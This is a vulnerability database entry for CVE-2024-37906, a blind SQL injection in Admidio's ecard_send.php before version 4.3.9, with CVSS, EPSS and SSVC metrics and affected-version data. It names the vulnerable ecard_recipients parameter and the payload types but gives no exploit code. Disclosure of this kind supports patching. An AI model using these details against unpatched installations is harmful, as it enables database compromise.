GitHub_MVULNRICHMENT:CVE-2024-37906CVE-2024-37906 Admidio has Blind SQL Injection in ecard_send.php
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
9.4%
SSVC
Exploitation
poc
Automatable
no
Technical Impact
total
Admidio is a free, open source user management system for websites of organizations and groups. In Admidio before version 4.3.9, there is an SQL Injection in the /adm_program/modules/ecards/ecard_send.php source file of the Admidio Application. The SQL Injection results in a compromise of the application’s database. The value of ecard_recipients POST parameter is being directly concatenated with the SQL query in the source code causing the SQL Injection. The SQL Injection can be exploited by a member user, using blind condition-based, time-based, and Out of band interaction SQL Injection payloads. This vulnerability is fixed in 4.3.9.
ADP Affected
[
{
"cpes": [
"cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*"
],
"vendor": "admidio",
"product": "admidio",
"versions": [
{
"status": "affected",
"version": "0",
"lessThan": "4.3.9",
"versionType": "custom"
}
],
"defaultStatus": "unknown"
}
]Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
9.4%
SSVC
Exploitation
poc
Automatable
no
Technical Impact
total